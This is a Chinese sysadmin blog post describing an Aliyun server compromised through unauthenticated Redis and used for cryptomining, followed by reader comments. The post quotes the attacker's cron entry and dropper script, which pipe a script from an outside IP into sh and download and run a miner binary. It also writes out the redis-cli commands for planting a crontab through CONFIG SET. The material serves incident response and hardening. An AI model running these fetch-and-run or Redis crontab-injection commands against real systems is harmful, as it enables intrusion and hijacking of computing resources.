文档章节

阿里云服务器被入侵——redis挖矿

perofu
 perofu
发布于 2017/06/20 16:16
字数 647
阅读 6756
收藏 83

1、起因:

        发现运维平台上没有昨天计划任务相关的数据,登上服务器,才发现crontab被改了

[root@58 ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh

2、处理过程:

①、停掉计划任务:

[root@58 ~]# crontab -e
#*/5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh

②、lastb:查看暴力破解的记录,发现并没有异常

[root@58 ~]# lastb
dev      ssh:notty    172.16.1.xx      Tue Jun 13 22:49 - 22:49  (00:00)    
dev      ssh:notty    172.16.1.xx      Tue Jun 13 22:32 - 22:32  (00:00) 

③、查看有毒脚本:

[root@58 tmp]$curl -fsSL http://218.248.40.228:9999/i.sh?6
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.1009" ]; then
    curl -fsSL http://218.248.40.228:9999/1009/ddg.$(uname -m) -o /tmp/ddg.1009
fi
chmod +x /tmp/ddg.1009 && /tmp/ddg.1009

④、ps axu:查看异常进程

root     13715  0.0  0.1 700584 16116 ?        Sl   Jun18   0:50 /tmp/ddg.1009
root     13796  299 17.2 1756884 1387384 ?     SLsl Jun18 4236:14 /tmp/wnTKYg.noaes

⑤、文件处理:

#删除
[root@58 ~]# ll /var/spool/cron/crontabs
total 4
-rw-r--r-- 1 root root 62 Jun 19 09:35 root
[root@58 ~]# rm -rf /var/spool/cron/crontabs

#取消执行权限
[root@58 ~]# ll /tmp/ddg.1009
-rwxr-xr-x 1 root root 8890464 Jun 18 10:09 /tmp/ddg.1009
[root@58 ~]#
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/ddg.1009

[root@58 ~]# ll /tmp/wnTKYg.noaes
-rwxr-xr-x 1 root root 1365824 Jun 18 10:12 /tmp/wnTKYg.noaes
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/wnTKYg.noaes

#kill进程

[root@58 ~]# kill -9 13715
[root@58 ~]# kill -9 13796

⑥、#修改root登陆
#.ssh/authorized_keys,也要替换

3、入侵思考:

①、服务器的iptable是只开了ssh的web的端口,且ssh使用密钥登陆,且没有发现尝试登陆的异常;

②、查看web的日志,没有发现异常访问,应该是某个软件的问题?

③、最后确定是redis无验证挖矿(搜索了linux ddg.1009),阿里云的安全组是允许0.0.0.0的访问的

④、阿里云这个0.0.0.0,巨坑啊,应该是某个贱人从其他阿里云的机器登陆到redis的,即阿里云的安全组有0.0.0.0的,是可以访问其他不属于自己的机器】

4、安全调整:

①、服务器加上iptables的限制,只允许再用的ip访问

②、redis改成nologin的用户启动

③、redis CONFIG修改成其他的名称:【rename-command CONFIG "Wyl0LFt2UhR"】

④、修改redis端口

5、redis修改计划任务相关命令:

#set 1:这样可以控制第一条记录,就能保证你的内容始终保持在最前面
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
redis-cli flushall

=============================== 完 ==============================

© 著作权归作者所有

共有 人打赏支持
perofu
粉丝 128
博文 155
码字总数 131715
作品 0
广州
系统管理员
私信 提问
加载中

评论(26)

a
andyNW
话说。。。。公司内网的一台服务器也被挖抗了。。。。都不知道怎么被入侵的。
OSC_SsdftZ
OSC_SsdftZ
和我的腾讯云一样
shijunti
shijunti
redis设置密码不就好了,不需要管ip
12叔
12叔
任何的都是要设置密码的。。
妩媚的悟空
妩媚的悟空

引用来自“ixiaohei”的评论

我一般redis bind 127.0.0.1
赞,挖矿处理:https://help.aliyun.com/knowledge_detail/41206.html
Redis服务加固:https://help.aliyun.com/knowledge_detail/37447.html
勒索事件防护:https://help.aliyun.com/knowledge_detail/48701.html
妩媚的悟空
妩媚的悟空

引用来自“岁月轻狂k”的评论

真傻
哈哈哈
妩媚的悟空
妩媚的悟空

引用来自“nAFa”的评论

好文。
前两个月公司的阿里云服务器其中一台也是被这么通过redis6379的端口入侵了,htop查看双核的cpu其中一个总是100%,另外一个正常,好在服务还可以正常访问。后来正好那台服务器没有几天就要到期,干脆就换新机器了。
挖矿处理:https://help.aliyun.com/knowledge_detail/41206.html
Redis服务加固:https://help.aliyun.com/knowledge_detail/37447.html
勒索事件防护:https://help.aliyun.com/knowledge_detail/48701.html
妩媚的悟空
妩媚的悟空

引用来自“亦可塞艇”的评论

redis设置密码可行吗
挖矿处理:https://help.aliyun.com/knowledge_detail/41206.html
Redis服务加固:https://help.aliyun.com/knowledge_detail/37447.html
勒索事件防护:https://help.aliyun.com/knowledge_detail/48701.html
妩媚的悟空
妩媚的悟空
挖矿处理:https://help.aliyun.com/knowledge_detail/41206.html
Redis服务加固:https://help.aliyun.com/knowledge_detail/37447.html
勒索事件防护:https://help.aliyun.com/knowledge_detail/48701.html
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

背景 2月20日17时许,阿里云安全监测到一起大规模挖矿事件,判断为Watchdogs蠕虫导致,并在第一时间进行了应急处置。 该蠕虫短时间内即造成大量Linux主机沦陷,一方面是利用Redis未授权访问和...

云安全专家
02/28
0
0
威胁情报| DockerKiller:首个针对Docker的批量攻击与利用实例

随着微服务的热度不断上升,越来越多的企业选择容器来部署自己的应用。而Docker作为实现微服务首选容器,在大规模部署的同时其安全性却没有引起足够的重视。 近期阿里云安全团队发现首个针对...

云安全2016
2018/08/24
0
0
预警:黑客利用Hadoop Yarn未授权访问漏洞

  【IT168 评论】4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API未授权访问漏洞进行攻击。   Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 Ma...

云栖社区
2018/05/07
0
0
首发预警 | 黑客利用Hadoop Yarn资源管理系统未授权访问漏洞进行攻击

4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API未授权访问漏洞进行攻击。 Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处...

云安全2016
2018/05/07
0
0
威胁快报|首爆新型ibus蠕虫,利用热门漏洞疯狂挖矿牟利

一、背景 近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件。黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台“肉鸡”作为蠕虫脚本的下载源。其余受...

云安全专家
02/01
0
0

没有更多内容

加载失败,请刷新页面

加载更多

【git命令】git-rebase

修改历史提交记录 作用简要概括为:可以对某一段线性提交历史进行编辑、删除、复制、粘贴;因此,合理使用rebase命令可以使我们的提交历史干净、简洁! 前提:不要通过rebase对任何已经提交到...

echojson
2分钟前
0
0
Python+Appium自动化测试环境搭建

1.Android SDK 下载SDK并配置系统环境变量ANDROID_HOME。 2.Appium 2.1 直接下载安装 官网下载安装appium-desktop-setup.exe。 2.2 通过npm下载安装 appium本质是一个nodejs库所以要先安装n...

维他ViTa
39分钟前
2
0
MacOS安装单机版HBase

MacOS安装HBase,必然是用于测试了,从简入手、从简配置。 直接通过brew安装即可: brew install hbase 成功安装后,验证是否成功,如果不出意外的话,应该有如下输出: RippleMBP:~ userna...

RippleChan
今天
3
0
linux下oracle随操作系统启动而启动

大家一定还记得,我们在windows下安装oracle后,重起windows,数据库会自动启动,但在linux下,如果我们重起了操作系统, 就会发现数据库需要手工去输入,这个本来有好处,让dba知道操作系统已经重起...

突突突酱
今天
4
0
nacos之springboot

本地操作系统:ubuntu18,我使用docker的方式启动nacos服务 docker image方式启动nacos 在docker hub上可以搜到nacos-server List-1.1 拉去最新的版本 mjduan@mjduan-ubuntu:/opt/software$ ...

克虏伯
今天
3
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部